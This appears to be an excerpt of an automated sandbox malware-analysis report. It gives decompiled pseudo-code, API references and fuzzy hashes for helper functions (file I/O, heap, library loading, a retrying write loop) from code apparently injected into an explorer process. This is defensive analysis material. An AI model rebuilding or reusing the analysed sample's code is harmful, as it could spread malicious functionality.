                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
                  • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,0293FD30,00000400), ref: 0008A776
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseFileHandleRead
                  • String ID:
                  • API String ID: 2331702139-0
                  • Opcode ID: ca62800ed02cc5b57c05881d120ba52d5520cda00c9b5ce7c327e703e9c6b6df
                  • Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
                  • Opcode Fuzzy Hash: ca62800ed02cc5b57c05881d120ba52d5520cda00c9b5ce7c327e703e9c6b6df
                  • Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085CEC, Relevance: 3.0, APIs: 2, Instructions: 38COMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E00085CEC() {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t22;
				void* _t33;

				_t8 =  *0x9e688; // 0xb0000
				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000885EF();
				E00088F78();
				 *0x9e780 = 0;
				 *0x9e784 = 0;
				 *0x9e77c = 0;
				E00085EB6(); // executed
				E0008CF84(_t22);
				_t14 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7,  *((intOrPtr*)(_t15 + 0xac)) + 7);
				E0008B337( &_v44);
				memset( &_v44, 0, 0x27);
				E00085C26( &_v44, _t33);
				ExitProcess(0);
			}









                  0x00085cef
                  0x00085cfe
                  0x00085d03
                  0x00085d08
                  0x00085d0f
                  0x00085d15
                  0x00085d1b
                  0x00085d21
                  0x00085d26
                  0x00085d2b
                  0x00085d33
                  0x00085d3d
                  0x00085d4b
                  0x00085d53
                  0x00085d5f
                  0x00085d67
                  0x00085d72

                  APIs
                    • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                    • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                    • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                    • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
                    • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                    • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                    • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                  • memset.MSVCRT ref: 00085D5F
                  • ExitProcess.KERNELBASE(00000000,?,?,?), ref: 00085D72
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Process$Currentmemset$CloseCreateExitFileHandleHeapModuleNameVersion
                  • String ID:
                  • API String ID: 1180775259-0
                  • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                  • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
                  • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                  • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008E1BC, Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 247 8e1bc-8e1dc call 895c7 250 8e1de-8e1e4 GetModuleHandleA 247->250 251 8e1e6-8e1eb LoadLibraryA 247->251 252 8e1ed-8e1ef 250->252 251->252 253 8e1fe-8e20c call 885c2 252->253 254 8e1f1-8e1f6 call 8e171 252->254 257 8e1fb-8e1fc 254->257 257->253
                  C-Code - Quality: 47%
                  			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000895C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0008E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000885C2( &_v8);
				return _t25;
			}










                  0x0008e1bf
                  0x0008e1c2
                  0x0008e1c8
                  0x0008e1ca
                  0x0008e1cf
                  0x0008e1d1
                  0x0008e1db
                  0x0008e1dc
                  0x0008e1eb
                  0x0008e1de
                  0x0008e1de
                  0x0008e1de
                  0x0008e1ef
                  0x0008e1f6
                  0x0008e1fc
                  0x0008e1fc
                  0x0008e201
                  0x0008e20c

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
                  • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 4133054770-0
                  • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                  • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
                  • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                  • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A65C, Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 259 8a65c-8a66d 260 8a69e-8a6a0 259->260 261 8a66f-8a691 WriteFile 259->261 264 8a6a1-8a6a4 260->264 262 8a693-8a69c 261->262 263 8a6a5-8a6a7 261->263 262->260 262->261 263->264
                  C-Code - Quality: 88%
                  			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}









                  0x0008a65c
                  0x0008a65f
                  0x0008a660
                  0x0008a663
                  0x0008a665
                  0x0008a668
                  0x0008a66d
                  0x0008a69e
                  0x0008a6a0
                  0x0008a66f
                  0x0008a66f
                  0x0008a66f
                  0x0008a691
                  0x00000000
                  0x00000000
                  0x0008a693
                  0x0008a696
                  0x0008a69c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008a69c
                  0x0008a6a5
                  0x0008a6a5
                  0x0008a6a1
                  0x0008a6a4

                  APIs
                  • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                  • Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
                  • Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                  • Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A5F7, Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 265 8a5f7-8a61a CreateFileW 266 8a61c-8a61e 265->266 267 8a620-8a623 265->267 268 8a637-8a63a 266->268 269 8a635 267->269 270 8a625-8a62e 267->270 269->268 270->269
                  C-Code - Quality: 100%
                  			E0008A5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x9e684; // 0x293f8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}






                  0x0008a601
                  0x0008a615
                  0x0008a61a
                  0x0008a623
                  0x0008a625
                  0x0008a62f
                  0x0008a62f
                  0x00000000
                  0x0008a635
                  0x00000000

                  APIs
                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                  • Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
                  • Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                  • Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A63B, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 271 8a63b-8a65b CreateFileW
                  C-Code - Quality: 68%
                  			E0008A63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}




                  0x0008a64f
                  0x0008a652
                  0x0008a657
                  0x0008a65b

                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                  • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
                  • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                  • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00088604, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 272 88604-88619 RtlAllocateHeap
                  C-Code - Quality: 100%
                  			E00088604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
				return _t2;
			}




                  0x00088612
                  0x00088619

                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                  • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
                  • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                  • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000885EF, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 273 885ef-88603 HeapCreate
                  C-Code - Quality: 100%
                  			E000885EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x9e768 = _t1;
				return _t1;
			}




                  0x000885f8
                  0x000885fe
                  0x00088603

                  APIs
                  • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                  • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
                  • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                  • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008F9BF, Relevance: 1.4, APIs: 1, Instructions: 119sleepCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0008F9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0x9e654; // 0x293fd30
				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0x9e654; // 0x293fd30
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000886E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E0008109A(_t63, 0x34a);
						_t66 =  *0x9e688; // 0xb0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0x9e688; // 0xb0000
						_push(_t67);
						_v20 = E000892E5(_t39 + 0x1020);
						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000885D5( &_v24);
						E000885D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0x9e654; // 0x293fd30
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E0008861A( &_v16, _t69);
						E0008861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0x9e654; // 0x293fd30
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0x9e688; // 0xb0000
						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0x9e654; // 0x293fd30
							continue;
						}
						break;
					}
					E0008861A( &_v12, 0); // executed
				}
				return 0;
			}

























                  0x0008f9c5
                  0x0008f9cd
                  0x0008f9d2
                  0x0008f9d8
                  0x0008f9de
                  0x0008f9f1
                  0x0008f9fb
                  0x0008fa05
                  0x0008fa08
                  0x0008fa0d
                  0x0008fa23
                  0x0008fa27
                  0x0008fa2c
                  0x0008fa2d
                  0x0008fa2e
                  0x0008fa33
                  0x0008fa36
                  0x0008fa37
                  0x0008fa38
                  0x0008fa3d
                  0x0008fa4c
                  0x0008fa51
                  0x0008fa56
                  0x0008fa5d
                  0x0008fa66
                  0x0008fa6b
                  0x0008fa6e
                  0x0008fa71
                  0x0008fa76
                  0x0008fa7c
                  0x0008fa81
                  0x0008fa86
                  0x0008fa89
                  0x0008fa9c
                  0x0008faa1
                  0x0008faa4
                  0x0008faa4
                  0x0008faac
                  0x0008fab7
                  0x0008fabc
                  0x0008fabf
                  0x0008fac2
                  0x0008fac2
                  0x0008fac8
                  0x0008faca
                  0x0008face
                  0x0008fad9
                  0x0008fade
                  0x0008fae3
                  0x00000000
                  0x00000000
                  0x0008faec
                  0x0008faf2
                  0x0008faf9
                  0x0008fafb
                  0x0008fafe
                  0x00000000
                  0x0008fafe
                  0x00000000
                  0x0008faf9
                  0x0008fb0b
                  0x0008fb14
                  0x0008fb18

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeapSleep
                  • String ID:
                  • API String ID: 4201116106-0
                  • Opcode ID: 218e46642d78c5d6b86fef64c9d17df7a156db10b2ffb4e54eab35899db9a0cc
                  • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
                  • Opcode Fuzzy Hash: 218e46642d78c5d6b86fef64c9d17df7a156db10b2ffb4e54eab35899db9a0cc
                  • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085D7D, Relevance: 1.3, APIs: 1, Instructions: 49stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00085D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0x9e684; // 0x293f8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0x9e688; // 0xb0000
					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0x9e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00089EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0x9e688; // 0xb0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0x9e684; // 0x293f8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}















                  0x00085d80
                  0x00085d95
                  0x00085d9e
                  0x00085da7
                  0x00085da9
                  0x00085db1
                  0x00085dc1
                  0x00085dcf
                  0x00085dd4
                  0x00085dd9
                  0x00085ddb
                  0x00085ddd
                  0x00085de2
                  0x00085de4
                  0x00085dff
                  0x00085dff
                  0x00085de6
                  0x00085de7
                  0x00085df2
                  0x00085dfa
                  0x00085dfc
                  0x00085dfc
                  0x00085de4
                  0x00085e01
                  0x00085db3
                  0x00085db4
                  0x00085db9
                  0x00085dbe
                  0x00085dbe
                  0x00085e05

                  APIs
                  • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: lstrcmpi
                  • String ID:
                  • API String ID: 1586166983-0
                  • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                  • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
                  • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                  • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008BA05, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008BA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x9e68c; // 0x293fab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E0008B998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x9e684; // 0x293f8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}












                  0x0008ba0a
                  0x0008ba12
                  0x0008ba1a
                  0x0008ba1f
                  0x0008ba29
                  0x0008ba32
                  0x0008ba37
                  0x0008ba3c
                  0x0008ba5a
                  0x0008ba5d
                  0x0008ba3e
                  0x0008ba41
                  0x0008ba43
                  0x0008ba4b
                  0x0008ba4b
                  0x0008ba4e
                  0x0008ba4e
                  0x0008ba61
                  0x0008ba22
                  0x0008ba22
                  0x0008ba22

                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                  • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
                  • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                  • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008861A, Relevance: 1.3, APIs: 1, Instructions: 33memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E0008C392(_t9);
						}
					} else {
						_t4 = E0008C379(_t9);
					}
					E0008874F(_t9, 0, _t4);
					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
				}
				return _t3;
			}






                  0x0008861d
                  0x00088622
                  0x00088668
                  0x00088668
                  0x00088625
                  0x00088629
                  0x0008862b
                  0x0008862e
                  0x00088634
                  0x00088642
                  0x00088646
                  0x00088646
                  0x00088636
                  0x00088637
                  0x0008863c
                  0x0008864f
                  0x00088660
                  0x00088660
                  0x00000000

                  APIs
                  • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                  • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
                  • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                  • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A77D, Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E0008A5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E0008A65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}








                  0x0008a786
                  0x0008a787
                  0x0008a78c
                  0x0008a790
                  0x0008a79f
                  0x0008a7a7
                  0x0008a7b4
                  0x00000000
                  0x0008a7b7
                  0x0008a7ab
                  0x00000000
                  0x0008a7ab
                  0x00000000

                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                  • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
                  • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                  • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
